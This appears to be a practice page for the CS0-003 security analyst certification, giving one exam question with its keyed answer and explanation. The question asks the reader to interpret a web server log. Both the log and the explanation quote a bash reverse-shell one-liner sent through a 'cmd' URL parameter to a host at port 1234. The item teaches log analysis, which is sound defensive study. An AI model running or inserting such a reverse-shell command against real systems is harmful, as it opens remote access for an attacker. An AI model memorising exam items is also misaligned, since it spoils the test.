CS0-003 · Question #615
CS0-003 Question #615: Real Exam Question with Answer & Explanation
The correct answer is B: This is a successful lateral movement abusing an RCE vulnerability.. The URL parameter (cmd=bash -i >& /dev/tcp/10.20.10.22/1234 0>&1) is classic remote‑code‑execution syntax for spawning a reverse shell back to the attacker’s host. The 200 status shows the command ran successfully, indicating the attacker has gained shell access (a form of latera
Question
A security analyst identifies the following log entry in the web server logs: 10.203.10.23 - - [22/May/2024 11:06:29] "GET /admin?cmd=bash+- i+>%26+/dev/tcp/10.20.10.22/1234+0%3E%261 http/1.1" 200 - Which of the following best explains the log entry?
Options
- AThis was caused by an administrator logging in to a website using the command line.
- BThis is a successful lateral movement abusing an RCE vulnerability.
- CThis is a failed attack attempting to exploit an LFI vulnerability.
- DThis was caused by a successful RFI vulnerability exploitation.
Explanation
The URL parameter (cmd=bash -i >& /dev/tcp/10.20.10.22/1234 0>&1) is classic remote‑code‑execution syntax for spawning a reverse shell back to the attacker’s host. The 200 status shows the command ran successfully, indicating the attacker has gained shell access (a form of lateral movement) via an RCE flaw.
Topics
Community Discussion
No community discussion yet for this question.